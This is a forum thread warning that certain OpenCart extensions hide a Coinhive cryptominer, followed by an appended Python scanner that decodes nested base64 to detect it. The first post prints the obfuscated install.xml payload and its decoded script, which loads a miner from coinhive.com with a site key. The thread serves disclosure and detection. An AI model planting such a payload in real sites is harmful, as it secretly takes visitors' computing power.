
Caution open cart extensions found with coinhive malware

Posted: Tue Feb 20, 2018 5:10 am
by rebeccag
I have found that these 3 extensions are infected with coinhive malware; do not install them.

https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab

The install.xml contains this

Code:

		$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg=='); 

decodes to this

Code:

<script> document.write("<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>

Re: Caution open cart extensions found with coinhive malware

Posted: Tue Feb 20, 2018 5:42 am
by OSWorX
Have you reported the developer and those extensions?

Re: Caution open cart extensions found with coinhive malware

Posted: Tue Feb 20, 2018 11:52 am
by IP_CAM
Well, I reported them about 10 days ago, but OC does not seem to care much about it, as it looks. ::)
Ernie

Re: Caution open cart extensions found with coinhive malware

Posted: Fri Feb 23, 2018 5:59 am
by rebeccag
One other user reported they had already reported it about 2 weeks ago, but nothing seems to have happened yet. I sent another support request this morning. I also added warnings to the extensions, but the uploader keeps deleting them.

Re: Caution open cart extensions found with coinhive malware

Posted: Fri Feb 23, 2018 7:46 am
by IP_CAM
Well, it almost looks like taking the last chance, to still generate some income ... ::)
Ernie

Re: Caution open cart extensions found with coinhive malware

Posted: Tue Jun 12, 2018 8:10 am
by zaidladha
Who was the developer? Is there a list of infected extensions?

Re: Caution open cart extensions found with coinhive malware

Posted: Tue Jun 12, 2018 10:40 am
by IP_CAM
Well, just scan your OC Software for:

Code:

coinhive.com
and if you don't find anything, you don't have to worry about coinhive :D
Ernie
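
An added example, not part of any post in this thread: a scanner for the `coinhive` string suggested above that also decodes quoted base64 literals, because the `install.xml` line in the first post carries its payload base64-encoded and so does not contain that string in plain text. The file extensions, the depth cap and the sample line are assumptions constructed for illustration.

```python
import base64
import binascii
import os
import re

INDICATORS = ("coinhive",)   # string named in the thread, matched case-insensitively
MAX_DEPTH = 4                # assumed cap on nested encodings
# Quoted runs of the base64 alphabet, e.g. base64_decode('...') or atob('...')
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")


def find_indicators(text, depth=0):
    """Return (depth, indicator) hits in text and in base64 literals nested inside it."""
    lowered = text.lower()
    hits = [(depth, ind) for ind in INDICATORS if ind in lowered]
    if depth >= MAX_DEPTH:
        return hits
    for match in B64_LITERAL.finditer(text):
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue         # not valid base64, or not text: ignore this literal
        hits.extend(find_indicators(decoded, depth + 1))
    return hits


def scan_tree(root, exts=(".xml", ".php", ".js", ".tpl", ".twig")):
    """Map each file under root that has hits to its list of hits."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_indicators(fh.read())
                if hits:
                    report[path] = hits
    return report


def b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed sample shaped like the install.xml line in the first post: the URL is
# base64-encoded inside a script string that is itself base64-encoded.
URL = "https://coinhive.com/lib/coinhive.min.js"
INNER = "<script src='\" + atob('" + b64(URL) + "') + \"'></script>"
SAMPLE_LINE = "$inherit = base64_decode('" + b64(INNER) + "');"

if __name__ == "__main__":
    print("plain search finds it:", "coinhive" in SAMPLE_LINE.lower())
    print("decoded hits:", find_indicators(SAMPLE_LINE))
```

The depth in each hit shows how many base64 layers had to be removed before the string appeared; depth 0 is what a plain text search would also find.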